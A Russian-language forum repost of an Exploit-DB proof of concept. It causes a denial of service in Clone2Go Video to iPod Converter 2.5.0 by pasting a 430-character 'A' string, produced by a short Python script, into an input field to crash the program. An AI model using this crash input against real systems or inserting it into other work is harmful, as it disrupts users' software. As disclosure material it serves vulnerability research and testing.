- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 45397
- Проверка EDB
-
- Пройдено
- Автор
- ZWX
- Тип уязвимости
- DOS
- Платформа
- WINDOWS_X86
- CVE
- N/A
- Дата публикации
- 2018-09-13
Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)
Код:
# Exploit Title: Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)
# Exploit Author: ZwX
# Exploit Date: 2018-09-11
# Vendor Homepage : http://www.clone2go.com/
# Software Link: http://www.clone2go.com/down/video-to-ipod-setup.exe
# Tested on OS: Windows 7
# Proof of Concept (PoC):
# The local buffer overflow vulnerability can be exploited by local attackers with
# restricted system user account without user interaction. For security demonstration
# or to reproduce follow the provided information and steps below to continue.
# Manual steps to reproduce the vulnerability ...
# 1 Install the software and start the client
# 2 Copy the AAAA...string from bof.txt to clipboard
# 3 Run VideoConverter.exex
# 4 Go Menu Menu > Edit > Options > Set Output folder (Input)
# 5 Paste it the input AAAA....string and click Open
# 6 A messagebox opens click ok
# 7 Software will stable crash or shut down
# 8 Successful reproduce of the Denial of Service
#!/usr/bin/python
buffer = "\x41" * 430
poc = buffer
file = open("poc.txt","w")
file.write(poc)
file.close()
print "POC Created by ZwX"
- Источник
- www.exploit-db.com